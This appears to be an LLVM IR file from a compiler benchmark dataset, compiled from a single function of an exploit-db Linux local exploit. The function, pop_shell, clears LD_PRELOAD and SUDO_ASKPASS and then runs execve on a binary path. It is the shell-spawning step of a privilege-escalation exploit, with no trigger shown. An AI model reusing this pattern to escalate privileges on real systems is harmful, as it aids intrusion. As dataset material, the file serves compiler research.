; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_25134.c_pop_shell.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_25134.c_pop_shell.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [11 x i8] c"LD_PRELOAD\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"SUDO_ASKPASS\00", align 1
@BD_COMPILED = common dso_local global i8* null, align 8
@environ = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @pop_shell() #0 {
  %1 = alloca i8*, align 8
  %2 = alloca [2 x i8*], align 16
  %3 = call i32 @unsetenv(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0))
  %4 = call i32 @unsetenv(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0))
  %5 = getelementptr inbounds [2 x i8*], [2 x i8*]* %2, i64 0, i64 0
  %6 = load i8*, i8** @BD_COMPILED, align 8
  store i8* %6, i8** %5, align 8
  %7 = getelementptr inbounds i8*, i8** %5, i64 1
  store i8* null, i8** %7, align 8
  %8 = load i8*, i8** @BD_COMPILED, align 8
  %9 = getelementptr inbounds [2 x i8*], [2 x i8*]* %2, i64 0, i64 0
  %10 = load i32, i32* @environ, align 4
  %11 = call i32 @execve(i8* %8, i8** %9, i32 %10)
  %12 = load i8*, i8** %1, align 8
  ret i8* %12
}

declare dso_local i32 @unsetenv(i8*) #1

declare dso_local i32 @execve(i8*, i8**, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
